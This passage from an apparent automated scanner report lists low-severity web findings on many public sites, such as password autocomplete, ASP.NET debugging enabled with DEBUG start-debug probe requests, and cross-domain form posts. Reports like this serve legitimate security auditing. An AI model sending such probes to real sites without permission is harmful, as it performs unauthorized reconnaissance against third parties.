Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
</strong>
               <form id="frm_login" method="post" action="/">
                   <input type="text" class="text" name="login_email" id="login_email" />
                   <input type="password" class="text" name="login_password" id="login_password" />
                   <a href="/user/reset">
...[SNIP]...
15.2. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...
15.3. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
               <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                   <div class="login-email">
...[SNIP]...
<input type="text" name="" class="password-text form-input urchin" data-urchin="login_modal/password" id="modal-password-text" value="Password" />
                   <input type="password" name="loginPassword" class="password form-input" id="modal-password" value="" />
                   
                   </div>
...[SNIP]...
15.4. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...
16. ASP.NET debugging enabled  previous  next
There are 15 instances of this issue:

16.1. http://www.blogtv.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blogtv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.blogtv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:00:24 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.2. http://www.clearchannel.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clearchannel.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.clearchannel.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:37:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.3. http://www.findlocation.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.findlocation.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.findlocation.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:54:30 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.4. http://www.investopedia.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.investopedia.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.investopedia.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:14:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.5. http://www.medicare.gov/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.medicare.gov
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.medicare.gov
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:04:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.6. http://www.netquote.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netquote.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.netquote.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:36:38 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.7. http://www.newegg.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newegg.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.newegg.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
x-server-id: 102
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Date: Sat, 02 Apr 2011 13:40:39 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:28 GMT;path=/

Debug access denied to '/Default.aspx'.
16.8. http://www.pch.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pch.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pch.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:27:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="www.pch.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.9. http://www.plentyoffish.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.plentyoffish.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.plentyoffish.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:27:01 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.10. http://www.pricegong.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pricegong.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pricegong.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:05:08 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Server-Name: WEB01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.11. http://www.shopperreports.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.shopperreports.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.shopperreports.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 14:07:47 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
S: NHIS01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.12. http://www.tidaltv.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tidaltv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tidaltv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.13. http://www.weatherbug.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weatherbug.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.weatherbug.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 12:44:08 GMT
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
16.14. http://www.wellness.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wellness.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wellness.com
Command: start-debug

Response

HTTP/1.0 401 Unauthorized
Date: Sat, 02 Apr 2011 13:33:51 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
ETag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
X-Cache: MISS from squid3.earnware.corp
X-Cache-Lookup: MISS from squid3.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid3.earnware.corp (squid)
Connection: close

Debug access denied to '/Default.aspx'.
16.15. http://www.winbuyer.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.winbuyer.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.winbuyer.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
17. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kcom.com
Path:   /contact-us/

Request 1

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.kcom.com/ - ">


<!-- NOTE: These fields are optional debugging elements. Please uncomment -->
<!-- these lines if you wish to test in debug mode. -->
<!-- <input type="hidden" name="debug" value=1> -->
<!-- <input type="hidden" name="debugEmail" value="zoe.keeping@kcom.com"> -->



<div class="left"><p><label for="first_name"><span class="orange">*</span>First Name:</label><br /><input id="first_name" maxlength="40" name="first_name" size="25" type="text" tabindex="2" /></p></div>

<div class="left"><p><label for="last_name"><span class="orange">*</span>Last Name:</label><br /><input id="last_name" maxlength="80" name="last_name" size="39" type="text" tabindex="3" /><br /></p></div>

<div class="both"><p><label for="email"><span class="orange">*</span>Email Address:</label><br /><input id="email" maxlength="80" name="email" size="55" type="text" tabindex="4"/><br /></p>

<p><label for="company">Company Name:</label><br /><input id="company" maxlength="40" name="company" size="55" type="text" tabindex="5" /><br /></p>

<p><span class="orange">*</span><label for="Postcode">PostCode:</label><br /><input id="zip" maxlength="30" name="zip" size="35" type="text" tabindex="6" /><br /></p>

<p><label for="phone">Phone Number:</label><br /><input id="phone" maxlength="40" name="phone" size="35" type="text" tabindex="7" /><br /></p></div>

<p>Preferred contact method:<br />
<label for="00N300000055SIy">Phone</label><input id="00N300000055SIy" name="00N300000055SIy" type="checkbox" value="1" />

<label for="00N300000055SIx">E-mail</label><input id="00N300000055SIx" name="00N300000055SIx" type="checkbox" value="1" /><br /></p>

<p><label for="description">Include a message:</label><br /><textarea name="00N300000057r28" id="00N300000057r28" rows="6" cols="74" tabindex="1"></textarea><br /></p>

<p><label for="00N300000055tV4">If you would not like to recieve information from us in the future
...[SNIP]...

Request 2

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749051; expires=Sun, 01-Apr-2012 13:57:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:31 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - - ">


<!-- NOTE: These fields are optional debugging elements. Please uncomment -->
<!-- these lines if you wish to test in debug mode. -->
<!-- <input type="hidden" name="debug" value=1> -->
<!-- <input type="hidden" name="debugEmail" value="zoe.keeping@kcom.com"> -->



<div class="left"><p><label for="first_name"><span class="orange">*</span>First Name:</label><br /><input id="first_name" maxlength="40" name="first_name" size="25" type="text" tabindex="2" /></p></div>

<div class="left"><p><label for="last_name"><span class="orange">*</span>Last Name:</label><br /><input id="last_name" maxlength="80" name="last_name" size="39" type="text" tabindex="3" /><br /></p></div>

<div class="both"><p><label for="email"><span class="orange">*</span>Email Address:</label><br /><input id="email" maxlength="80" name="email" size="55" type="text" tabindex="4"/><br /></p>

<p><label for="company">Company Name:</label><br /><input id="company" maxlength="40" name="company" size="55" type="text" tabindex="5" /><br /></p>

<p><span class="orange">*</span><label for="Postcode">PostCode:</label><br /><input id="zip" maxlength="30" name="zip" size="35" type="text" tabindex="6" /><br /></p>

<p><label for="phone">Phone Number:</label><br /><input id="phone" maxlength="40" name="phone" size="35" type="text" tabindex="7" /><br /></p></div>

<p>Preferred contact method:<br />
<label for="00N300000055SIy">Phone</label><input id="00N300000055SIy" name="00N300000055SIy" type="checkbox" value="1" />

<label for="00N300000055SIx">E-mail</label><input id="00N300000055SIx" name="00N300000055SIx" type="checkbox" value="1" /><br /></p>

<p><label for="description">Include a message:</label><br /><textarea name="00N300000057r28" id="00N300000057r28" rows="6" cols="74" tabindex="1"></textarea><br /></p>

<p><label for="00N300000055tV4">If you would not like to recieve information from us in the future, please check this
...[SNIP]...
18. Cross-domain POST  previous  next
There are 2 instances of this issue:

18.1. http://www.kcom.com/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
</p>
                           
                                       
<form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" onsubmit="return fullCheck(this);">

<input type="hidden" name="oid" value="00D30000000YSXR">
...[SNIP]...
18.2. http://www.realsimple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realsimple.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
ETag: "11faa34-1413-4875db8624980"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Content-Length: 36963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found - Re
...[SNIP]...
</span>
<form id="ftr_nl_form" method="post" action="http://ebm.cheetahmail.com/r/regf2"><input value="1085805114" type="hidden" name="aid">
...[SNIP]...
19. Cross-domain Referer leakage  previous  next
There are 43 instances of this issue:

19.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
